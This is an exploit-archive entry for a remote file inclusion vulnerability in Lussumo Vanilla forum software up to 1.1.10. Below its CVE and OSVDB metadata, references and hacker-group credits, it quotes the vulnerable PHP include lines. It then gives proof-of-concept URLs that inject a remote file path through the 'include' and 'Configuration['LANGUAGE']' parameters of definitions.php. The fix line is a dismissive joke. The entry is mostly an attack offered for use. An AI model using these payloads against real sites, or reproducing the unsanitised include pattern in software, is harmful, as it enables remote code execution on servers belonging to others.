Vanilla-1.1.10 <= Remote File Inclusion Vulnerability

2010-04-13T00:00:00
ID 1337DAY-ID-11775
Type zdt
Reporter eidelweiss
Modified 2010-04-13T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =====================================================
Vanilla-1.1.10 <= Remote File Inclusion Vulnerability
=====================================================

########################################################
    Vanilla-1.1.10 <= Remote File Inclusion Vulnerability
########################################################
 
Title:      Vanilla-1.1.10 <= Remote File Inclusion Vulnerability
Version:    1.1.10
link:       http://php.opensourcecms.com/scripts/redirect/website.php?id=128
License:    -
CVE-ID:     CVE-2010-1337
OSVDB-ID:   63654
Vulnerable: Lussumo Vanilla 1.1.10
        Lussumo Vanilla 1.1.9
        Lussumo Vanilla 1.1.8
        Lussumo Vanilla 1.1.7
        Lussumo Vanilla 1.1.5
        Lussumo Vanilla 1.1.4
        Lussumo Vanilla 1.1.3
        Lussumo Vanilla 1.0.1
        Lussumo Vanilla 1.1.5 RC1
        Lussumo Vanilla 1.0
References: http://www.packetstormsecurity.com/1003-exploits/vanilla-rfi.txt
        http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1337
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-1337
        http://osvdb.org/show/osvdb/63654
        http://www.securityfocus.com/bid/38889
        http://xforce.iss.net/xforce/xfdb/57147
########################################################
 
Author:     eidelweiss
Contact:    eidelweiss[at]cyberservices.com
Thanks: JosS (hack0wn) - r0073r & 0x1D (inj3ct0r) - LeQhi - aRiee - idiot_inside - kuris
    Old friend in MEDANHACKER (c02,blackbandit,t0rnado,LordIRC,doegoel,qwert)
    AL-MARHUM - [D]eal [C]yber - syabilla_putri (miss u)
 
########################################################
 
    -=[ VULN ]=-
 
[-] include($Configuration['LANGUAGES_PATH'].$Configuration['LANGUAGE'].'/definitions.php');
 
[-] include($Configuration['APPLICATION_PATH'].'conf/language.php');
 
    -=[ P0C ]=-
 
[+] PATH/languages/yourlanguage/definitions.php?include= [inj3ct0r]
[+] PATH/languages/yourlanguage/definitions.php?Configuration['LANGUAGE']= [inj3ct0r]
 
################################################################
[ FIX ] Use Your Skill and Play Your Imagination
################################################################



#  0day.today [2018-01-05]  #